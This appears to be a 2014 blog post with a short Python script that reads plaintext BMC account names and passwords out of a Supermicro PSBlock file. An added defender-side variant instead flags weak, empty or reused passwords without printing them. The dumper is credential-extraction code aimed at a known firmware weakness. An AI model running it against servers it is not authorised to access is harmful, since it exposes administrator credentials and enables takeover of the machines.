Jan 25, 2014

A trivial utility to dump password/account information from a special file found on a Supermicro (SM) BMC; see this Rapid7 post about the PSBlock file.

(Later edit – I put a new version on GitHub that fixes a bug.)

#!/usr/bin/env python

# usage: $0 file

#
# (try to) Dump out passwords/accounts from a SM binary file;
# usually this is in /conf or /vm on the BMC, and goes by
# various names such as PSBlock, PSStore, PMConfig.dat, and
# the like.  This has *only* been tested on PSBlock files,
# but the theory appears to be the same; find the first account
# and password pair and march through the file at regular
# intervals until you find all the matches.
#

import re
import sys

ACCOUNT_SIZE  = 16
PASSWD_SIZE   = 20   # IPMI 2.0
FIRST_ACCOUNT = 85   # the fun starts here
NEXT_ACCOUNT  = 64   # N bytes later
MAX_ACCOUNTS  =  9   # a guess

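# need exactly one argument: the file to read
if len(sys.argv) != 2:
   print("usage: %s file" % sys.argv[0])
   sys.exit(1)

try:
   sm = open(sys.argv[1], "rb")
except IOError:
   print("couldn't open %s" % sys.argv[1])
   sys.exit(2)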

# skip the header: seek to the first account record (offset FIRST_ACCOUNT)
sm.seek(FIRST_ACCOUNT,0)

# loop for accounts/passwords
for i in range(0,MAX_ACCOUNTS + 1):

   # go to the right place
   sm.seek(FIRST_ACCOUNT + i * NEXT_ACCOUNT, 0)

   # grabit
   account = sm.read(ACCOUNT_SIZE)
   passwd  = sm.read(PASSWD_SIZE)

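   # strip trailing nulls; read() returns bytes on Python 3, so use
   # bytes patterns and decode before printing
   account = re.sub(b'\000*$', b'', account).decode('latin-1')
   passwd  = re.sub(b'\000*$', b'', passwd).decode('latin-1')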

   if len(account) > 0 and account[0] != '\000':
      print("Account [%d]: %s" % (i, account))
      print("Password[%d]: %s" % (i, passwd))

sm.close()
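
As a defender-side companion to the script above, this added example (not the original author's code) reads the same record layout but reports only policy findings per account, never the password text. `MIN_LEN`, the finding wording and the sample blob are assumptions constructed for illustration.

```python
FIRST_ACCOUNT, NEXT_ACCOUNT = 85, 64   # layout constants from the script above
ACCOUNT_SIZE, PASSWD_SIZE, MAX_ACCOUNTS = 16, 20, 9
MIN_LEN = 12                           # assumed local policy, not from the page

def parse_records(blob):
    """Yield (slot, account, password) for each populated record."""
    for i in range(MAX_ACCOUNTS + 1):
        off = FIRST_ACCOUNT + i * NEXT_ACCOUNT
        rec = blob[off:off + ACCOUNT_SIZE + PASSWD_SIZE]
        if len(rec) < ACCOUNT_SIZE + PASSWD_SIZE:
            break                      # truncated file: stop rather than guess
        account = rec[:ACCOUNT_SIZE].rstrip(b"\0")
        passwd = rec[ACCOUNT_SIZE:].rstrip(b"\0")
        if account and account[:1] != b"\0":
            yield i, account.decode("latin-1"), passwd.decode("latin-1")

def audit(blob):
    """Return {slot: (account, [findings])}; password text is never returned."""
    records = list(parse_records(blob))
    counts = {}
    for _, _, pw in records:
        counts[pw] = counts.get(pw, 0) + 1
    report = {}
    for slot, acct, pw in records:
        findings = []
        if not pw:
            findings.append("empty password")
        elif pw.lower() == acct.lower():
            findings.append("password equals account name")
        if pw and len(pw) < MIN_LEN:
            findings.append("shorter than %d chars" % MIN_LEN)
        if pw and counts[pw] > 1:
            findings.append("reused across accounts")
        report[slot] = (acct, findings)
    return report

def make_sample():
    """Constructed blob in the layout above; not data from a real BMC."""
    blob = bytearray(FIRST_ACCOUNT + (MAX_ACCOUNTS + 1) * NEXT_ACCOUNT)
    sample = {0: (b"operator", b"operator"), 2: (b"svc", b"Long-Unique-Pass-01")}
    for slot, (acct, pw) in sample.items():
        off = FIRST_ACCOUNT + slot * NEXT_ACCOUNT
        blob[off:off + len(acct)] = acct
        blob[off + ACCOUNT_SIZE:off + ACCOUNT_SIZE + len(pw)] = pw
    return bytes(blob)

if __name__ == "__main__":
    for slot, (acct, findings) in sorted(audit(make_sample()).items()):
        print("slot %d  %-16s %s" % (slot, acct, "; ".join(findings) or "ok"))
```

Run against a configuration backup you are authorised to review, the report can be attached to a ticket without putting any credential into the ticketing system.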
 Posted by at 2:32 pm on January 25, 2014
